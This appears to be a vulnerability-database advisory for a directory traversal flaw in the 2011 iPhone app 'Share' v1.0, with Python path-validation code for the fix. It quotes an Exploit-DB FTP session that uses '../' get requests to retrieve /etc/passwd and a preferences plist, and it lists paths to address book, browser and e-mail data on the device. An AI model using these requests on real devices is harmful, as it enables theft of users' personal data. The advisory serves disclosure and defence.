Vendor: Share
By: R3d@l3rt, Sunlight, H@ckk3y
CVSS: 7.5 (HIGH)
CWE: 22 (Directory Traversal)
Product Name: Share
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:apple:share
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: iPhone, iPod 3GS with 4.2.1 firmware
2011

Share v1.0 for iPhone / iPod touch, Directory Traversal

There is a directory traversal vulnerability in Share. Exploit testing involves connecting to the app's FTP server and using the 'get' command with ../ sequences to traverse the directory structure and access sensitive files such as the passwd and com.apple.conference.plist files.

Mitigation:

Ensure that the application is not vulnerable to directory traversal attacks: validate the path supplied by the user so that it cannot leave the shared directory, and restrict access to sensitive files.
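One way to implement the path validation described above, as an added example that is not the app's own code: the server canonicalises every client-supplied path and refuses anything that resolves outside the shared directory. The names resolve_in_root, PathEscape and demo are hypothetical, and the share directory and request list are constructed for the demonstration.

```python
import os
import tempfile


class PathEscape(Exception):
    """Requested FTP path resolves outside the shared root."""


def resolve_in_root(root, cwd, requested):
    """Map an FTP path argument (RETR/CWD/LIST) to a real path inside root."""
    if "\x00" in requested:
        raise PathEscape(requested)
    real_root = os.path.realpath(root)
    # Absolute client paths are relative to the virtual root, never the real "/".
    virtual = requested if requested.startswith("/") else cwd + "/" + requested
    candidate = os.path.realpath(os.path.join(real_root, virtual.lstrip("/")))
    # realpath() has collapsed "..", "." and symlinks. Compare whole path
    # components so "share-private" does not pass as being inside "share".
    if os.path.commonpath([real_root, candidate]) != real_root:
        raise PathEscape(requested)
    return candidate


def demo():
    """Run the check over constructed requests against a temporary share."""
    requests = ("SpreadMobData.plist", "../../../../../etc/passwd",
                "/../../etc/passwd", "../share-private/secret", "link/passwd")
    results = {}
    with tempfile.TemporaryDirectory() as base:
        root = os.path.join(base, "share")
        os.makedirs(root)
        os.makedirs(os.path.join(base, "share-private"))  # sibling with same prefix
        open(os.path.join(root, "SpreadMobData.plist"), "w").close()
        os.symlink("/etc", os.path.join(root, "link"))  # symlink out of the share
        for req in requests:
            try:
                resolve_in_root(root, "/", req)
                results[req] = "allowed"
            except PathEscape:
                results[req] = "denied"
    return results


if __name__ == "__main__":
    for req, verdict in demo().items():
        print(f"{verdict:8} {req}")
```

Only the file inside the share is allowed; the ../ requests, the sibling directory that shares the root's name prefix and the symlink pointing out of the share are all denied.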

Exploit-DB raw data:

# Exploit Title: Share v1.0 for iPhone / iPod touch, Directory Traversal 
# Date: 02/24/2011
# Author: R3d@l3rt, Sunlight, H@ckk3y
# Software Link : http://itunes.apple.com/kr/app/filer-lite-download-view-manage/id350671847?mt=8
# Version: 1.0
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware  

# There is a directory traversal vulnerability in Share.
# Exploit Testing

C:\>ftp
ftp> open 192.168.0.70 20000
Connected to 192.168.0.70.
220 DiddyFTP server ready.
User (192.168.0.70:(none)): anonymous
331 Password required for anonymous
Password:
230 User anonymous logged in.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for '/bin/ls'.
total 5
-rw-r--r--     1 mobile mobile      17389 Jan 06 12:55 315978923.951142.png
-rw-r--r--     1 mobile mobile     447330 Jan 06 16:22 315991374.643888.png
-rw-r--r--     1 mobile mobile      17389 Jan 06 16:44 315992677.644726.png
-rw-r--r--     1 mobile mobile     242857 Feb 24 15:52 320223133.910055.png
-rw-r--r--     1 mobile mobile        493 Feb 24 15:50 SpreadMobData.plist

226 Transfer complete.
ftp: 390 bytes received in 0.00Seconds 390000.00Kbytes/sec.
ftp> get ../../../../../etc/passwd
200 PORT command successful.
150 Opening BINARY mode data connection for '../../../../../etc/passwd'.
226 Transfer complete.
ftp: 787 bytes received in 0.01Seconds 52.47Kbytes/sec.
ftp> get ../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist
200 PORT command successful.
150 Opening BINARY mode data connection for '../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist'.
226 Transfer complete.
ftp: 272 bytes received in 0.00Seconds 272000.00Kbytes/sec.
ftp> quit

C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file.  Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false


C:\>type com.apple.conference.plist
bplist00?_restoredFromBackup\natTypeCache?
_DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R
outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:a5:XX:XX:XX? XnatFlag
C:\>



# iPhone inside information

1. Phone Book
 - /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
     
2. Safari Favorites List
 - /private/var/mobile/Library/Safari

3. Users E-mail Information
 - /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist

4. IPv4 Router Information
 - /private/var/mobile/Library/Preferences/com.apple.conference.plist